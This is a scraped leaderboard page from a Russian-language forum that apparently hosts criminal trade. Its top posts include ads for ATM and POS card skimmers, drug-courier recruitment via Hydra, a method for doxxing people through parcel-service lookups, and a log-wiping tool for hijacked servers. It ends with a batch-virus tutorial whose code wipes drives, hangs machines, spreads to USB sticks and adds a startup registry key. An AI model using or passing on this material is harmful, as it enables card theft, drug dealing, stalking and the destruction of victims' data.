Таблица лидеров
-
во всех областях
- Все области
- Adverts
- Advert Questions
- Advert Reviews
- Файлы
- Комментарии к файлам
- Отзывы к файлам
- Записи блога
- Комментарии блога
- Изображения
- Комментарии к изображениям
- Отзывы к изображению
- Альбомы
- Комментарии к альбому
- Отзывы к альбому
- События
- Комментарии к событиям
- Отзывы к событиям
- Сообщения
- Статусы
- Ответы на статус
-
Пользовательская дата
-
Всё время
9 октября 2021 - 10 сентября 2025
-
Год
10 сентября 2024 - 10 сентября 2025
-
Месяц
10 августа 2025 - 10 сентября 2025
-
Неделя
3 сентября 2025 - 10 сентября 2025
-
Сегодня
10 сентября 2025
-
Пользовательская дата
27.12.2022 - 27.12.2022
-
Всё время
Популярные публикации
Отображаются публикации с наибольшей репутацией на 27.12.2022 во всех областях
-
5 баллов
-
3 балла
-
2 балла
-
2 балла
-
2 балла
-
2 балла
-
2 балла
-
2 балла
-
1 балл
-
1 балл
-
1 балл
-
1 балл
-
1 балл
-
1 балл
THIS ADVERT HAS EXPIRED!
- FOR SALE
- NEW
ДОСТУПНА НОВАЯ ВЕРСИЯ – НОВЫЙ ИНТЕРФЕЙС, ПОВЫШЕННАЯ АНТЕННА, МОДЕЛЬ V22.3.4 LTE2017-модель 2018 года. Скимминг банкоматов без какого-либо физического контакта. Этот скиммер будет работать без физического подключения к банкомату/POS-машине. Этот продукт является нашим бестселлером и является самым популярным устройством для скимминга кредитных карт во всем мире. Это GSM-перехватчик – скиммер. Он получает данные кредитных карт из банкоматов и POS-терминалов. Небольшой размер 5×4 сантиметра, длина антенны 17 сантиметров. С одной зарядкой он может работать до 8 часов, а изготовленная память может захватывать около 100000 данных кредитных карт, с антенной он может принимать данные в радиусе 50 метров. Устройство может работать от (-25 до +45 градусов). Мы используем батареи 3,7 В 2500 мАч. При одной зарядке устройство может работать до 8-10 часов. Он имеет встроенную память 32 Гб, он может хранить до 100000 данных кредитной карты с pin-кодами. Кратко – Приемник данных GSM-это приемник GSM-модуля, который с помощью специального программного обеспечения клонирует и получает всю информацию о кредитных картах из банкоматов и POS-терминалов. Полученная информация хранится на вашем телефоне или ноутбуке. Чтобы собрать эту информацию, вам просто нужно подключить устройство к компьютеру или мобильному устройству, и устройство отправит данные на ваш компьютер, с помощью программного обеспечения V22.3.4. GSM-приемник также реализовал новую функцию, возможность добавления банка питания для увеличения срока службы скимминга. GSM – приемник данных небольшой, и вы можете легко спрятать его в сумке, одежде, кармане или в автомобиле-рядом с терминалом POS/ATM. Устройство имеет два светодиода – красный и зеленый Красный – Устройство должно заряжаться. Мигающий красный – Устройство может работать еще 30-40 минут, после чего его необходимо зарядить или добавить блок питания или зарядное устройство usb. Зеленый+Красный – Устройство работает. Мигает зеленым – устройство подключается. Цена за GSM перехватчика $1200 USD с доставкой включена. Цена GSM перехватчика + энкодер MSR и 100 пустых пустых карт $1415USD с доставкой включена.1,200.00 USD
-
1 балл
THIS ADVERT HAS EXPIRED!
- FOR SALE
- NEW
СКИММЕР-ЭТО УСТРОЙСТВО, КОТОРОЕ ПОМЕЩАЕТСЯ ВНУТРИ БАНКОМАТА ИЛИ POS. СКИММЕР EMV ПЕРЕХВАТЫВАЕТ СООБЩЕНИЯ МЕЖДУ ЧИПОВОЙ КАРТОЙ И СЧИТЫВАТЕЛЕМ ЧИПОВЫХ КАРТ ИЗ БАНКОМАТА ИЛИ POS. СКИММЕР EMV ЗАПИШЕТ ИНФОРМАЦИЮ О КРЕДИТНОЙ КАРТЕ, ТАКИМ ОБРАЗОМ, ИНФОРМАЦИЯ О КРЕДИТНОЙ КАРТЕ БУДЕТ УКРАДЕНА. СКИММЕР EMV-ЭТО УСТРОЙСТВО, КОТОРОЕ ПОМЕЩАЕТСЯ ВНУТРИ БАНКОМАТА ИЛИ POS ДЛЯ ПЕРЕХВАТА СВЯЗИ МЕЖДУ ЧИПОВОЙ КАРТОЙ И СЧИТЫВАТЕЛЕМ ЧИПОВЫХ КАРТ ИЗ БАНКОМАТА ИЛИ POS И ЗАПИСИ ИНФОРМАЦИИ О КРЕДИТНОЙ КАРТЕ, ТАКИМ ОБРАЗОМ, ИНФОРМАЦИЯ О КРЕДИТНОЙ КАРТЕ БУДЕТ УКРАДЕНА. Скиммер Emv-это устройство, которое помещается внутри банкомата или POS для перехвата сообщений и записи кредитной карты между чиповой картой и считывателем чипов из банкомата или POS, таким образом, вся информация о кредитной карте похищается. У вас будет быстрый и простой трек 1, трек 2 и PIN-код со всех кредитных карт, которые используют эти банкоматы или POS. Вы можете загрузить информацию с скиммера Emv, подключив телефон или ноутбук по Bluetooth к скиммеру Emv. Такое устройство СКИММЕРА EMV может не только считывать данные владельца карты с чипа, но и перехватывать PIN-код. УСТРОЙСТВО СКИММЕРА EMV создает копию исходной карты, включая все стандартные проверки подлинности SDA-Статическая проверка подлинности данных, DDA - Динамическая проверка подлинности данных, CDA-Комбинированная проверка подлинности данных. С помощью нашего устройства EMV Скиммер вы можете очень легко получить всю информацию о кредитной карте из любого банкомата или POS. С помощью устройства СКИММЕРА EMV вы можете получить трек 1 + 2 + Pin.1,600.00 USD
-
1 балл
-
1 баллЭто все потому, что в наше время слишком сильно люди зависимы от мнения окружающих , оттуда все и идет
-
1 баллРабота! от 350к/мес. Мы есть на HYDRA! Приглашаем на работу ответственных и работоспособных людей! Свободны вакансии кладмэна во всех активных городах! :: москва :: :: иваново :: :: нижний :: :: крым :: :: питер :: :: казань :: :: смоленск :: :: уфа :: :: воронеж :: :: краснодар :: :: саратов :: :: чебоксары :: :: сургут :: :: новосибирск :: :: тюмень :: :: екатеринбург :: :: и много других городов России, пишите уточняйте! :: Залог от - 5.000 ! Чем больше залог, тем лучше ваше начало в нашем магазине! Средняя месячная зарплата - от 350тыс.руб. Минимальная оплата за клад - 450/500рублей! Требования к закладчику: постоянство! адекватность! умение делать качественные клады! мобильность и уверенность в себе! моментальная связь с администрацией! Если это описания подходит к тебе и ты готов зарабатывать реальные деньги - пиши в https://t.me/HighQualityWork Все вопросы по трудоустройству принимаются в telegram в любое время Вы получите своевременный ответ! Итак если все прочитанное Вас устраивает, заполняйте анкету и высылайте нам с пометкой "работа, Дроппер, город в котором планируете работать" 1. Город 2. Возраст (18+ обязательно) 3. Текущая занятость, какой объем работ планируете выполнять? 4. Опыт работы в этой сфере 5. Наличие личного транспорта 6. Условия проживания 7. Отношение к употреблению наркотиков, алкоголь в том числе 8. Размер предоставляемого залога 9. Наличие судимостей и проблем с законом вообще 10. Наличие компьютера и фототехники 11. Наличие навыков и способностей, применимых к работе в этой сфере 12. Предполагаемый срок работы, готовность к работе на важных должностях 13. Почему вы хотите работать именно в нашей команде? 14. Откуда вы узнали о нас?
-
1 балл
-
1 баллПредисловие Такая вещь как пробив по номеру телефона это безусловно очень интересно и если в РФ это можно сделать через работников магазинчиков сотовой связи, так как там рега симки по докам, то в Украине не все так просто и нужно пробивать по каким‐либо базам, глупо возражать, что самых крупных баз в Украине две это Приват Банк и Новая почта, но как же нам подобраться к ним? Я хотел запустить свой сервис пробива и деанона и ломал голову над вопросом – Как иметь доступ к базам этих гигантов? Устраиваться на работу не вариант, так как я слишком крут для этого, а знакомых, которые бы там работали тоже под рукой не оказалось, вот и было решено искать друзей в интернете, но все оказалось не так просто, все кого я нашел не понимали что вообще происходит у меня сложилось впечатление, что в новой почте работают только отбитые люди (никого не хочу обидеть, но на диалог вывести таких людей просто невозможно) И тут меня осенило, я затестил свою схему и уже через 30 минут после того как я её придумал я пробил свою первую жертву моими расходами оказалась – коробка от чайника. Суть Когда мы отправляем посылку в новой почте происходит следующее ‐ мы называем наш номер телефона ‐ нам говорят ФИО, которое есть у них в базе или предлагают нам представиться, если нас в ней не оказалось ‐ мы называем номер телефона получателя ‐ нам говорят его ФИО или предлагают представить его. Так отправляя абсолютно любой мусор вы можете пробивать людей, документы ваши при отправке посылок не требуются, так что можете назвать номер телефона вашей жертвы, если её нет в базе то рандомные ФИО и вам ничего не будет. Себестоимость пробива – любой мусор у вас дома. Пробивал я вот этого человека Выбрал я именно его, поскольку я хотел быть уверенным в том, что человек которого я пробиваю будет в базе, поэтому выбрал того, кто давно успешно торгует на одной из крупных площадок. Вот ссылка ‐ https://www.olx.ua/obyavlenie/opt‐drop‐muzhskie‐naruchnye‐chasy‐amst‐3003‐original‐ zhmi‐IDwcfcc.html (надеюсь она ещё валидна на момент прочтения манула) Вот ссылка на этого продавца (уверен что будет актуальной на момент прочтения) ‐ https://1990.olx.ua/ . Можете позвонить ему и спросить как его зовут ;)) Вот моя бумага с новой почты
-
1 балл
-
1 баллВсе таки понедельник не плохой день Работаю по схеме уже третий день и сегодня наконец то выхлоп , всего 500$ но это на половину отбивает схему , а с учетом, что сегодня только третий день, то скажу одно - ПУШКА
-
1 баллСпасибо за првоеденную работу, очень порадовало качество P.S ссылки битые у тебя в описание, поэтому и просил фото)
-
1 баллКомпьютерный гений Аарон Шварц, один из создателей формата RSS и борец за свободное распространение контента в Интернете, в 2013 году был найден повешенным в своей нью-йоркской квартире. 26-летний Шварц, страдавший депрессиями, о чем неоднократно писал на страницах личного блога, совершил суицид за несколько недель до того, как должен был предстать перед судом. В июне 2011 года суд Массачусетса предъявил Шварцу обвинение во взломе платного архива Массачусетского технологического института и краже миллионов размещенных в нем научных статей, которые благородный хакер выложил в свободном доступе. Согласно американскому законодательству, Шварцу грозило многолетнее тюремное заключение и штраф до миллиона долларов. «Аарон был экстраординарным хакером и ярким общественным активистом. Он сделал больше, чем кто бы то ни было в мире, для превращения Интернета в свободную платформу, позволяющую людям делиться друг с другом знаниями и для его сохранения в этом качестве», — утверждается в некрологе Шварца, опубликованном на сайте организации Electronic Frontier Foundation, выступающей за свободное распространение информации. Аарон Шварц имел репутацию компьютерного вундеркинда: в 14-летнем возрасте он стал одним из создателей RSS — семейства XML-форматов, предназначенных для описания лент новостей, анонсов статей, обновлений в блогах и т. п. Впоследствии он принимал активное участие в создании и работе сообщества Demand Progress, выступающего за свободное распространение информации и против цензуры в Интернете. Среди интернет-гуру Шварц считается инициатором широкого общественного движения, выступающего за отмену копирайта и свободное распространение в Интернете любого контента. «Мы должны проводить в последний путь этого отважного и одаренного человека под звуки “Реквиема” Моцарта», — написал в Твиттере другой борец за свободное распространение контента, Карл Маламуд. В 2008 году Маламуд и Шварц создали хакерскую программу, позволявшую пользователям свободно загружать документы из архива Федерального суда США, не платя, как того требовал правообладатель, несколько центов за страницу. Расследованием этого дела занималось ФБР, однако обвинение Шварцу и Маламуду тогда предъявлено не было. Три года спустя Шварц был арестован и обвинен в хищении миллионов статей из электронного архива Массачусетского технологического института. Следствие установило, что он взломал сервер, размещенный в одном из кампусов института, и скачал информацию с него на свой лэптоп. Против компьютерного гения было заведено дело по обвинению в мошенничестве. Виновным Шварц себя не признал. Суд над ним должен был начаться в будущем месяце. Согласно официальному обвинению, Шварц похитил материалы, размещенные в онлайн-сервисе JSTOR, предлагавшем платный доступ к публикациям из научных журналов. По мнению прокурора, хакер планировал выложить их в одной из бесплатных файлообменных сетей. В итоге Шварцу было предъявлено обвинение по 13 пунктам, в числе которых нарушение правил сайта, намерение разместить защищенные материалы в свободной пиринговой сети, компьютерное мошенничество и незаконное скачивание контента с защищенного компьютера. JSTOR не стал подавать иск против Шварца, при этом многие эксперты в области права отметили, что этот онлайн-сервис предоставлял свободный гостевой доступ работникам некоторых научных учреждений, и Шварц, как штатный сотрудник Центра этики им. Сафры Гарвардского университета, имел на него право. «Всем нам необходимо лучше понимать, что такое справедливость. Вопрос, который в первую очередь требует ответа: почему государству было необходимо во что бы то ни стало заклеймить Шварца как уголовника?» — отметил коллега покойного, профессор Центра этики Лоуренс Лессинг. Родные покойного обвиняют в смерти Шварца судебные органы: «Гибель Аарона — это не просто наша личная трагедия. Это результат работы нашей юридической системы, действующей с помощью запугивания и несовершенства законодательства. Действия должностных лиц прокуратуры штата Массачусетс и администрации Массачусетского технологического института послужили причиной гибели близкого нам человека», — говорится в официальном заявлении семьи Шварца. В знак протеста против действий прокуратуры и в память об Аароне Шварце в Интернете началась масштабная кампания. Ученые со всего мира публикуют в Facebook и Твиттере ссылки на файлы с защищенными авторским правом научными документами. В южнокорейской столице Сеул , тоже любят классическую музыку, подробнее вы сможете найти на сайте classic-music.ws а JSTOR объявил, что в ближайшее время в свободном доступе будут выложены более 4,5 млн файлов. «Аарон погиб за свободу в Интернете», — написал на своей странице в Facebook один из друзей Аарона Шварца.
-
1 баллПродавец попросил оставить отзыв на этой площадке Оставляю, ликвидировал мне фирму без проблем, хотя она была очень проблемная, да еще и взял копейки Спасибо.
-
1 балл
-
1 баллПроверить себя на анонимность: http://2ip.ru/privacy/ - отечественный ресурс http://witch.valdikss.org.ru/ - частная разработка BrowserLeaks.com — Web Browser Security Checklist for Identity Theft Protection - зарубежный ресурс На данный момент собрано 14 методов проверки: 1. Заголовки HTTP proxy Некоторые прокси дописывают свои заголовки к запросу, который инициирует браузер пользователя. Нередко это реальный IP адрес пользователя. Убедитесь, что прокси сервер, если и пишет что-то в заголовки указанные ниже, то хотя бы не ваш адрес: HTTP_VIA, HTTP_X_FORWARDED_FOR, HTTP_FORWARDED_FOR, HTTP_X_FORWARDED, HTTP_FORWARDED, HTTP_CLIENT_IP, HTTP_FORWARDED_FOR_IP, VIA, X_FORWARDED_FOR, FORWARDED_FOR, X_FORWARDED, FORWARDED, CLIENT_IP, FORWARDED_FOR_IP, HTTP_PROXY_CONNECTION 2. Открытые порты HTTP proxy IP адрес, с которого пришел запрос к нашей страничке может сказать о многом. Можно например посмотреть какие на той стороне открыты порты? Самые паленые порты: 3128, 1080 и 8123. Если их не использовать, то вполне можно избежать необоснованных подозрений в использовании 3proxy, SOCKS 5 или Polipo. 3. Открытые порты web proxy Как и в случае с HTTP, веб прокси можно повесить на любой порт, но мы хотели, чтобы тест работал очень быстро, поэтому ограничились обратным коннектом на порты 80 и 8080. Отдается веб страничка? Отлично! На данный момент мы умеем определять PHProxy, CGIProxy, Cohula и Glype. Нестандартные порты с авторизацией закрывают вопрос. 4. Подозрительное название хоста Имея IP адрес можно попробовать отрезолвить хостнейм клиента. Стоп слова, которые могут намекать на туннель: vpn, hide, hidden, proxy. Не стоит привязывать доменные имена к личному VPN, а если и делать это, то стоит избегать «говорящих» имён. 5. Разница во временных зонах (браузера и IP) Исходя из данных GeoIP можно узнать страну по IP пользователя, а следовательно и его временную зону. Дальше можно вычислить разницу во времени между браузером и временем соответствующим временной зоне VPN сервера. Разница есть? Значит пользователь наверняка скрывается. Для России точной базы latitude и longtitude для регионов нет, а так как временных зон много, то в конечном результате эти адреса мы не учитываем. С Европейскими странами всё наоборот, очень хорошо они палятся. При переключении на VPN нужно не забывать переводить системное время, менять время в браузере, либо работать с русскими прокси. 6. Принадлежность IP к сети Tor Если ваш IP адрес это Tor нода из списка сайт, поздравляю, вы спалились. Ничего криминального, но уже факт раскрытия того, что вы скрываетесь, не очень радует. 7. Режим браузера Turbo Собрав диапазоны IP адресов Google, Yandex и Opera, и сравнив с пользовательским адресом, можно предположить использование сервисов сжатия трафика в браузерах соответствующих компаний. Как правило такие сервисы ещё и сливают ваш реальный адрес в заголовках. Как на средство анонимизации, рассчитывать на сжатие трафика не следует. 8. Определение web proxy (JS метод) Сравнив window.location.hostname с хостом запрошенной страницы, можно определить используется ли web proxy. Веб прокси (по нашему анонимайзеры) в принципе не надёжны, поэтому лучше обходить такие способы анонимизации совсем. 9. Утечка IP через Flash Adobe Flash очень хорошо работает мимо пользовательских прокси. Инициировав соединение к нашему серверу, можно узнать IP пользователя. Запустив специального демона, который логирует все входящие соединения с ключами-метками, можно многое узнать. Лучший способ не раскрывать свой адрес — не использовать Adobe Flash вообще, или отключать в настройках браузера. К примеру, браузер Firefox по умолчанию отключает flash, стоит задуматься. 10. Определение туннеля (двусторонний пинг) Запустив пинг к клиентскому IP, со стороны нашего сервера, можно узнать приблизительную длину маршрута. То же самое можно сделать со стороны браузера, XMLHTTPRequest дёргает пустую страницу нашего nginx. Полученную разницу в петле более 30 мс можно интерпретировать как туннель. Конечно маршруты туда и обратно могут различаться, или веб сервер немного притормаживает, но в целом точность получается довольно хорошая. Единственный способ защититься — запретить ICMP трафик к своему VPN серверу, правильно настроив свой фаервол. 11. Утечка DNS Узнать какой DNS использует пользователь не проблема, мы написали свой DNS сервер, который записывает все обращения к нашим уникально сгенерированным поддоменам. Следующим шагом собрали статистику на несколько миллионов пользователей, кто и какой DNS использует. Сделали привязку к провайдерам, отбросили публичные DNS и получили список пар DNS/ISP. Теперь совсем не сложно узнать, если пользователь представился абонентом одной сети, а использует DNS совсем от другой. Частично проблему решает использование публичных DNS сервисов, если это можно назвать решением. 12. Утечка через социальные сети (ВКонтакте, одноклассники, мой мир и т.п.) Это не утечка IP адреса, но отдавая всем налево и направо имена авторизованных пользователей, к примеру VK сливает частные данные, которые подрывают всю анонимность серфинга. Подробнее можно посмотреть документацию здесь vk.com/dev/openapi. Кнопка «Выход» после каждой сессии в общем то решает вопрос, но лучшая рекомендация — не использовать социальные сети 13. WEB-RTC WebRTC позволяет устанавливать конференц-связь без использования плагинов через современные браузеры Mozilla и Chrome, но при этом раскрывает Ваш реальный IP даже при использовании VPN, а также список всех локальных IP-адресов, находящихся за NAT. WebRTC поддерживается только в браузерах Chrome и Firefox. Родной поддержки WebRTC браузерами Internet Explorer и Safari не существует. Отключение WebRTC в Firefox: В адресной строке браузера вводим Код: about:config Задаем в поиске: Код: media.peerconnection.enabled Устанавливаем значение в "false" и снова проверяем! Отключение WebRTC в Chrome: В браузере Google Chrome для блокировки WebRTC необходимо установить плагин WebRTC Block Отключение WebRTC на Android для пользователей Chrome: В адресной строке браузера Chrome вводим: Код: chrome://flags/#disable-webrtc Устанавливаем значение "enable" Еще один альтернативный способ определения proxy и vpn: 14. MSS и MTU MTU, или Maximum Transmission Unit — максимальное количество данных, которые могут быть переданы в одном пакете. MTU установлен у каждого сетевого адаптера, даже у тех маршрутизаторов, через которые трафик от вас до удаленного сервера идет транзитом. В большинстве случаев, в интернете используют MTU 1500, однако бывают заметные исключения, которые зачастую подчиняются некоторым правилам. Когда ваш браузер или любое другое ПО, работающее с сетью, создает TCP-соединение к удаленному серверу, в заголовки пакета помещается значение Maximum Segment Size (MSS), которое сообщает серверу, какого максимального размера сегменты он может передавать в одном пакете. Это значение очень близкое к MTU, оно сразу дает понять серверу о возможностях вашего интернет-соединения, исключая излишнюю фрагментацию и позволяя утилизировать ваш канал по полной. Когда вы отправляете пакет, будучи подключенным к VPN по какому-то протоколу (PPTP, L2TP(±IPsec), IPsec IKE), он помещается (инкапсулируется) в еще один пакет, что вносит свои накладные расходы, и большие пакеты, которые были бы отправлены без фрагментации без VPN, теперь придется фрагментировать. Чтобы избежать такой фрагментации, ОС устанавливает на сетевом интерфейсе MTU меньше, чем MTU реального сетевого интерфейса, из-за чего ОС не пытается создавать большие пакеты, которые требовали бы фрагментации. В случае с PPTP, L2TP(±IPsec), IPsec, как я понимаю, нет каких-то стандартов на MTU туннеля, все устанавливают такие значения, чтобы работало в большинстве случаев, и устанавливаются они на глаз. Как правило, это 1400, что позволяет использовать, скажем, PPTP на каналах с MTU до 1440 без фрагментации (например, когда для доступа в интернет требуется еще один туннель, как часто бывает у российских провайдеров). OpenVPN — почти самый популярный вариант VPN. При совместимости со старым или кривым софтом, OpenVPN по умолчанию не устанавливает меньшее значение MTU на VPN-интерфейсе, а изменяет значение MSS внутри инкапсулированного TCP-пакета. За это отвечает параметр mssfix, установленный по умолчанию в значение 1450. Он изменяет MSS таким образом, чтобы он полностью утилизировал канал с MTU 1450, т.е. высчитывает свои накладные расходы таким образом, чтобы они проходили через канал с MTU 1450 и более без фрагментации. В результате у нас появляется возможность не просто определить пользователей OpenVPN со стандартным mssfix 1450, но и определить их протокол подключения (IPv4, IPv6), протокол транспортного уровня (TCP, UDP), параметры шифрования, сжатия и MAC, т.к. они вносят свои уникальные накладные расходы и отражаются в MSS. Типичные параметры MSS: Если используется шифрование в 64 бита, то это Blowfish, а если 128 бит - AES. Тестирование двух VPN-сервисов: VyprVPN и ibVPN. Оба сервиса подвержены определению настроек описанным методом. Если вы не хотите, чтобы вас обнаруживали таким способом, вы можете либо отключить mssfix, установив его в 0 и на сервере, и на клиентах, получив таким образом MSS 1460 (характерно для IPv4), что соответствует MTU 1500 — типичному MTU для обычного проводного соединения, которое есть у подавляющего большинства пользователей. НО в этом случае вы получите излишнюю фрагментацию, что приведет к повышению задержек и уменьшению пропускной способности, поэтому стоит установить MTU в 1400, 1380 или похожее (должно быть кратно 10), т.к. такие значения часто используются провайдерами, например, мобильного интернета. Теперь немного о WITCH? Этот маленький проект расскажет вам о настройках вашего OpenVPN-соединения (если вы не изменяли mssfix), попытается определить вашу ОС и сравнить ее с ОС в User-Agent, получит PTR-запись для вашего IP и сравнит ее с набором правил, определяя, используете ли вы интернет-канал, рассчитанный на домашних или серверных пользователей. Код: First seen = 2015/07/24 17:19:29 Last update = 2015/07/24 18:39:37 Total flows = 7 Detected OS = Linux 3.11 and newer HTTP software = Firefox 10.x or newer (ID seems legit) MTU = 1409 Network link = OpenVPN UDP bs64 SHA1 Language = Russian Distance = 15 Uptime = 1 days 19 hrs 39 min (modulo 165 days) PTR test = Probably home user Fingerprint and OS match. No proxy detected. OpenVPN detected. Block size is 64 bytes long (probably Blowfish), MAC is SHA1. WITCH? также без проблем определяет пользователей Tor Browser, т.к. он использует одинаковый статичный User-Agent (с Windows) на всех ОС, а exit nodes запущены под Linux и FreeBSD. В результате тестирования на разных ОС и провайдерах выяснилось: Мобильный интернет от Beeline пропускает все соединения через прокси под Linux. Обнаружилось это, когда человек с Beeline зашел с iPhone на WITCH?, и ОС определилась как Linux. Вероятно, именно через него они меняют HTML-теги, добавляют тулбар с поиском mail.ru и изменяют дизайн сайтов. MTU у мобильных устройств может быть буквально какой угодно, но, как правило, заканчивается на 0. Исключение — Yota с 1358. От чего это зависит — непонятно, подозреваю, что и от настроек на стороне оператора, и от телефонного модуля. Одна и та же SIM в разных телефонах использует разные MTU. Код, который отвечает за mssfix в OpenVPN, очень медленный. Ну и в конце статьи я предлагаю затестить замечательный ресурс p0f Этот проект может пассивно прослушивать трафик, определять ОС, MTU и браузер, оповестить о несовпадении ОС создателя пакетов и ОС в User-Agent. p0f также имеет API. Немного модифицировав его, добавив экспорт MTU через API и обновив сигнатуры, можно детектировать пользователей популярных VPN-протоколов, пользователей прокси и тех пользователей, которые подделывают User-Agent.
-
1 баллСпс ребятам, купил 4 видеокарты, все прошло в срок, товар идеальный, благодарю
-
1 баллДа на**й это надо, проще процент дать обнальщикам и через них все сделать , а не еб*ся самому че то мутить
-
1 балл
-
1 баллПроблема решена Вернули 50% стоимости Спасибо гаранту , советую работать через него!
-
1 баллТема стара как этот мир. Заработать можно, но о пассивном доходе и речь тут не идет. Я бы лично и 50$ за такую схему пожалел.
-
1 баллCпасибо гаранту за проведение сделки. Очень рад работе данного форума и его команды. Давайте побольше качественного материала и услуг!
-
1 баллЕще как вариант: clear_log_by_xaker01 (чистка логов на дедике) 1) Сразу удаляет логи из Дедика 2) можно рядом написать число (1секунда=1000милисекунд) и запустить таймер когда пройдет эти секунды будет удалены все логи (функция полезна что бы не оставить следа при выходе в логах.нажал на кнопку и вышел 3) Цикл удаления то есть после нажатия на эту кнопку каждый 4 секунды будет произведена очистка логов (советую ее использовать так как бывает админ заходит на дед и вы вылетаете а логи очистить невозможно. А эта функция будет работать пока не выключить программу) Кстати плюс проги, если она логи не находит в диске С, то он ищет их через реестр путь и все ровно удаляет! Чистильщик V2.2 что нового? +Сворачивание в трее +кнопки переведены под windows стиль глюков небудет +теперь после запуска таймера программа удалит логи и закроется. +ускорение чистки логов циклом Рекомендуется запускать С правами админа ['Ссылка на скачку']
-
1 балл
-
1 балл
-
1 баллЗАРАБОТАЙ 20$ в день просто включая Multiclicker. Программа для быстрого и атоматического заработка на PTC спонсорах. Вам только стоит не забывать запускать эту программу и она сделает все за Вас сама! В новой версии переработана структура программы. +Инструкция для новичков в комплекте! +156 проверенных сайтов с Премиум Акаунтами и все плагины к этим сайтам. Особенности программы: - Имеет базу только проверенных PTC спонсоров - Полная безопасность использования - Не нужно вводить капчу при входе на PTC спонсор - Очень быстрая, надежная, стабильная в работе - Низкие требования к системе и к интернет-трафику - Поддержка всех версий Windows и Linux - Автоматическая проверка обновлений программы. Обязательно регистрируйтесь по ссылкам, которые указаны в текстовом редакторе! Иначе программа не будет работать! Скрин программы >>> http://i001.radikal.ru/1203/9c/70d6131c78c7.jpg Скачать программу здесь >>> http://depositfiles.com/files/cpc921q61
-
1 баллИтак, приступим. Вы решили заняться вирусо-писательством. Сразу вам скажу, что эти вирусы, конечно, могут очень сильно навредить компьютеру, но полноценно передаваться с одного компьютера на другой они не могут. За все, что произойдет с вашим компьютером отвечаете вы и только вы. Приступим: 1) Открываем блокнот; 2) Пишем в нем «mspaint», без кавычек; 3) Сохраняем файл под любым именем, но вместо .txt мы напишем .bat; 4) Откроем файлик и увидим, что открылся Paint)) Вот и готова наша первая программка. Вместо «mspaint» можно вписать любую программу, например: Calc-калькулятор, Taskmgr-диспетчер задач… Но при чем здесь вирусы? - спросите вы. Ни при чем)) Следующее, что мы сделаем, это программа для изменения времени на компьютере, да и еще она будит копировать себя на флешку (если та вставлена). Итак: Пишем в блокноте: time 00:00 copy %0 F:\Work.bat Первой сточкой мы изменяем время на 00:00, а второй скопируем файл на диск F - флешка с именем Work. Не забудьте, сохранить блокнотовский файл в формате .bat. Вместо времени можно изменить и дату «Date 13.06.23». Написав такую строчку, мы изменим дату на 2023 год, 6 месяц, 13 число)) Теперь небольшой перечень того, что можно писать в блокнотовском вирусе. СПИСОК: 1) «copy %0 x:\y» - копирует вирус на диск x в папку y (пример copy %0 C:\System.bat); 2) «label x:y» - переименовывает диск x на имя y (пример label C:error); 3) «time х:у» - меняет время на х часов и у минут (пример time 14:27); 4) «date x.y.z» - меняет дату на x день, y месяц, z лет (пример date 16.11.05); 5) «md х» - создаст папку, в том месте, где наш вирус, с именем х (пример md Papka); 6) «del *.* /q» - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок); 7) «del x:\y *.* /q» - удалит все файлы на диске х в папке у (кроме папок) (пример del F:\Data*.* /q); 8) «assoc .х=.у» - переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.mp3); 9) «net user "х" /add» - добавит на компьютер пользователя под именем х (пример net user "Smoked" /add); Вот две программки вам на рассмотрение, можете их использовать без моего соглашения, но, используя их, вы принимаете соглашение пользователя. 1)Программа для удаления файлов с флешки (если та вставлена) и переименования ее. del F:\ *.* /q label F:HACK 2)Программа для изменения даты и времени на компьютере и копирования ее на диск C и на флешку. time 14:13 date 11.07.12 copy %0 C:\Time.bat copy %0 F:\Time.bat Вы уже умеете создавать простенькие вирусы. Он умеет: менять время, дату, названия дисков и флешек, открывать программы, создавать папки, копировать себя, добавлять пользователей, менять расширения и уничтожать информацию. Это довольно небольшой список, чесно говоря. Теперь я научу вас некоторым тонкостям вирусописательсва. Допустим, вы уже сделали вирус, но выглядит он довольно некрасиво. Ну кто откроет непонятный файл? Вы правы, таких людей на свете не много. Как же изменить формат из .bat на .exe и добавить иконку. Очень легко (Нужно чтобы на компьютере был WinRAR). Находим любой вирус с расширением .bat, нажимаем на него правой кнопкой, жмем «Добавить в архив…». Ставим галочку «Создать SFX-архив», выбираем вкладку дополнительно, и кликаем на кнопку «Параметры SFX…». В окне «Выполнить после распаковки» пишем названия вируса (пример Virus.bat) а в окне «Текст и графика» далее «Загрузить значок SFX из фала». Жмем «Обзор» и ищем любой значок формата .ico. Теперь жмем ОК. Готово)) Формат .exe, а не .bat, как нам и надо было. Теперь можно делать с вирусами что угодно. А что именно, решать уже вам. Хотите научиться еще командам, которыми можно просто добить нашего «лоха», открываем www.Google.ru, пишем bat вирусы и жмем «Искать». Допустим, вы написали вирус, который будет портить открытую от папок информацию и немного вредить: del C:\ *.* /q del D:\ *.* /q del E:\ *.* /q del F:\ *.* /q time 00:00 date 13.06.23 del *.* /q Готово? – спросите вы. Нет. Нужно его закончить. Новая команда «@echo off» вводиться в начале нашего вируса и скрывает все, что в нем происходит в дальнейшем. Одним словом, не дадим пользователю увидеть, что случилось. Еще добавив после каждой команды простенькое, но очень эффективное действие, как «>nul» к примеру «time 00:00 >nul», мы скроем сточку. Итак, можно усовершенствовать наш вирус: @echo off del C:\ *.* /q >nul del D:\ *.* /q >nul del E:\ *.* /q >nul del F:\ *.* /q >nul time 00:00 >nul date 13.06.23 >nul del *.* /q >nul Вот, теперь наш вирус готов. Сохраняем, конвертируем, а вот, что дальше с ним делать — ваше дело. Кстати, есть отличная программа для конвертирования .bat в .exe, она работает намного лучше WinRAR'а, называется она «Bat to exe converter». Скачать ее можно в интернете, она бесплатная. Итак, вернемся к вирусо-писательству. %SystemRoot%/system32/rundll32 user32, SwapMouseButton Данная строчка меняет клавиши мыши местами. Можно с кого-то прикольнуться, пока он въедет, что случилось, пройдет время (если он совсем юзер), для особоодаренных скажу, если вы ввели это у себя отключить довольно просто: «Панель Управления», «Принтеры и другое оборудование», «Мышь» и снимаем первую галочку. Итак, дальше поехали дальше: :x ; Start mspaint goto x ; Очень неплохая строка для нагрузки слабеньких машин. Команда открывает Paint, причем очень быстро. Раз 60 до того как вы поймете, что случилось и закроете программу. Попробуйте ввести вместо mspaint любые строки программ... Работает)) Можно использовать по несколько таких команд до полного торможения компьютера жертвы. Новый скрипт: copy ""%0"" "%SystemRoot%\system32\File.bat" reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f reg add 